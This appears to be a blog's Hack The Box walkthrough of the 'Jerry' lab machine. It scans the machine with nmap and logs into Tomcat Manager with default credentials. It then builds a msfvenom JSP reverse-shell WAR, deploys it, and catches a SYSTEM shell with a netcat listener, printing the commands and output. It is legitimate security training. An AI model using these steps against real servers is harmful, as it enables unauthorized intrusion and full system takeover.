Home Hack The Box - Jerry
Post
Cancel

Hack The Box - Jerry

RECON

NMAP

Starting with nmap, it only shows one port 8080 (Apache Tomcat) open.

1
2
3
4
5
6
7
8
9
10
11
12
$sudo nmap -sC -sV -p- --min-rate 10000 -Pn -oN jerry-all-tcp.nmap 10.10.10.95 
Nmap scan report for 10.10.10.95
Host is up (0.092s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 16 21:13:37 2023 -- 1 IP address (1 host up) scanned in 31.99 seconds

PORT - 8080

Default install of tomcat.

Login

Using the default credentials tomcat:s3cret we can login to the Tomcat Manager Application.

EXPLOITINTG TOMCAT

Generating war file using msfvenom

1
$sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f war > shell.war

SHELL AS ADMINISTRATOR

Once we upload the war file and visit http://10.10.10.95/shell we get shell as administrator.

1
2
3
4
5
6
7
8
9
$sudo nc -lvnp 4444 
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.

Hack The Box - Devel

Hack The Box - Active

Comments powered by Disqus.